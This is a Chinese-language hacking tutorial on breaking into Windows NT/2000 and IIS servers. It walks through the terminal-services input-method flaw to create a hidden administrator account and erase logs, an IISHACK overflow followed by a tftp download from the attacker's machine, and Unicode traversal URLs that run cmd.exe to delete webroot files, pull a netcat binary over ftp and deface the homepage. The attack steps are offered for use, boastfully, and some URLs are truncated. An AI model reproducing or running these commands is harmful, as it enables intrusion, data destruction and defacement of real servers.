�iNT的各种漏洞利用法

/ns/cn/jc/data/20020811045514.htm

今天向大家介绍的是NT的终端服务入侵远程计算机、IISHACK远程溢出漏洞及用的最广泛的UNICODE漏洞!

攻击方法一:

NT的终端服务入侵远程计算机需要客户端软件也可以用基于WEB的客户端软件和一个端口扫描器(我这里的是HAKTEK,如果大家有扫描固定端口的扫描器也可以,直接扫描3389端口就可以了)还有一个操作系统扫描器Grinder.

目标主机必须条件:WIN2000的操作系统,开放远程3389端口及输入法漏洞

ACTION,打开Grinder输入一段IP地址扫描,嘿嘿,扫到一些NT的了
XXX.34.218.100 URL Present Microsoft-IIS/5.0
XXX.34.218.101 URL Present Microsoft-IIS/5.0
XXX.34.218.102 URL Present Microsoft-IIS/5.0
XXX.34.218.103 URL Present Microsoft-IIS/5.0
XXX.34.218.104 URL Present Microsoft-IIS/5.0

...........................................
...........................................

然后将IP地址逐个输入到HAKTEK里面扫描3389端口,没多上时间就可以找到一些了:

xxx.34.218.100

..............

NEXT,打开客户端软件(WEB的客户端也可以),输入IP地址确认,呵呵,对方的登陆屏幕出现在客户端里了,在用户名里输入几个任意字符,然后按Ctrl+shift键,将输入法转化为全拼模式,将鼠标放在状态条的全拼图标上按右键,然后在帮助选项的里面选择输入法入门(如果能弹出输入法入门的话,那就说明这个机器有输入法漏洞,如果没有的话,那就换台机器试试吧!)再然后就在这个页面的“选项”上按右键,在弹出的选项里选择跳至URL,在新弹出跳至URL的选项里输入c:\winnt\system32并确认,呵呵,出来了。

现在有两种方法可以攻击:

1.将对方c:\winnt\system32里的cmd.exe拷贝到c:\inetpub\scripts\ccc.exe 里面,然后在浏览器里用

http://xxx.34.218.100/scripts/ccc.exe?/c+dir

来进行攻击。这种攻击类似于unicode漏洞的攻击方法,后面要详细介绍的,现在就不赘述了。

2.在右边的窗口里选择net.exe文件,右键后选择创建快捷方式,然后就会生成一个net.lnk的文件,再就在这个文件上按右键选择属性,在弹出的新窗口里的目标里输入:

C:\winnt\system32\net.exe user sharpwinner/add

确认后,这个窗口就会消失,呵呵,不用慌张,这个net.lnk将这条命令加入到了它里面去了,然后你只要双击这个net.lnk,对方的计算机就会运行这条命令,然后我们将这个帐号加入到administrators组里面去:

C:\winnt\system32\net.exe localgroup administrators sharpwinner/add

呵呵,好,这一阶段的任务完成,关掉帮助等弹出的窗口,在客户端中输入帐号:sharpwinner,密码为空,Enter!哈哈,进去了,在目标计算机的c:\winnt\system32\里面将我们创建的net.lnk删掉,呵呵,立刻到日志文件下D掉所有的记录:c:\winnt\system32\logfiles

改主页就不用我再说了,呵呵,缺省的目录是c:\inetpub\wwwroot里面!

攻击方法二:

IISHACK攻击法需要工具:iishack (注:iishack.exe是攻击NT4.0的,iishack1.exe是攻击NT5.0的) netcat和tftp还有netdde

首先,将TFTP装到自己机器里面,将自己的机器变成一个FTP服务器。

然后,利用前面找到的nt机器xxx.34.218.100来进行攻击:

c:\iishack xxx.34.218.100 80 99

如果显示攻击成功的话,那就可以再输入:

c:\telnet xxx.34.218.100 99

呵呵,进去了,然后进入到对方的c:\winnt\system32\里面,输入:

c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe

然后再运行netdde.exe文件,建立一个帐号,将它的权限提升到administrators组:

c:\winnt\system32\netdde.exe net user make love /add

c:\winnt\system32\netdde.exe net localgroup administrators make /add

然后退出来,用net use \\xxx.34.218.100\ipc$ love /user:make 建立IPC连接,然后就不用我再说了吧 呵呵,上期已经讲过的。

攻击方法三:

攻击需要工具:rscan

UNICODE漏洞,呵呵,大家肯定都用过了吧,我这里利用方法和你们的不一样,不信就来看看:

关于UNICODE的原理由于时间原因,我就不讲了,现在先告诉大家不同语言系统的利用语句:

简体中文的NT4中编码为%c1%9c,简体中文的NT5.0的编码为%c1%1c,英文操作系统NT5.0的是%c0%af,在国外的一些网站中看到还有一些其他的编码:

%c1%pc

%c0%2f
%c1%1c
%c0%2f

%c1%1c
%c0%2f
%c0%2f
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af

有空大家可以测试。

我们现在就以简体中文的nt5.0或nt4.0的编码为例

先打开rscan工具,将编码的语句输入到里面去:(选择其中的一种)

/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe

不多久,出来了一大排,呵呵,够了

然后,我们以/scripts/..%c1%1c../winnt/system32/cmd.exe为例来进行攻击。(注:..%c1%1c..%c1%1c..%c1%1c..是向上退出4层,..%c1%1c..是向上退出两层,我们缺省的目录是c:\inetpub\scripts,所以向上退出两层就可以了)

先给大家一个UNICODE攻击的工具集吧!

1.显示文件的内容(type命令)

http://x.x.x.x/scripts/..%c1%1c../w...:\redhacker.txt

2.删掉空的子目录(rd命令)

http://x.x.x.x/scripts/..%c1%1c../w...d+c:\badboy.txt

这些简单的就不用再说了,大家只要熟悉windows命令就可以了,我们来点cool一点的。

3.我们将c:\winnt\system32里面的cmd.exe改名并拷贝到c:\inetpub\scripts\ccc.exe,那我们就可以这样来显示对方硬盘了:

http://x.x.x.x/scripts/ccc.exe?/c+dir

4.查找主页的存放地(缺省情况下是放在c:\inetpub\wwwroot下的,但具我攻击的经验来看,缺省的情况很少,那么我们就用最快的方法来查找index.htm或index.html)

http://x.x.x.x/scripts/ccc.exe?/c+c...find.exe?/n+/v+""+c:(d盘e盘都可以试试)\xxx\*.ht*

4.批处理命令运用法(.bat)

http://x.x.x.x/scripts/ccc.exe?/c+echo+del /f /s /q c:\inetpub\wwwroot\*.* > sharpwinner.txt

http://x.x.x.x/scripts/ccc.exe?/c+echo+rd /f /s /q c:\inetpub\wwwroot

>> sharpwinner.txt(注:>是改写文件内容,>>是向文件中插入信息)

这样对方的C盘里的c:\inetpub\wwwroot目录和里面的文件都被删掉了。

5.attrib命令的用法(有的主机会将index.html文件设为只读或隐藏,所以我们就得用attrib命令来去除这些保护。

http://x.x.x.x/scripts/..%c1%1c../w...m32/attrib.exe? -r -h c:\inetpub\wwwroot\index.html

6.ftp的用法。

http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>redhacker.txt

这里的srv.exe就是nc99.exe

7.echo命令的用法(最后一步,是做什么?大家猜猜,呵呵,当然是篡改主页了,主页都不能改,那还做黑客啊,呵呵)

http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by sharpwinner >c:\inetpub\wwwroot\index.html

打开浏览器一看,index.html的内容变成了hacked by sharpwinner,嘿嘿,篡改成功。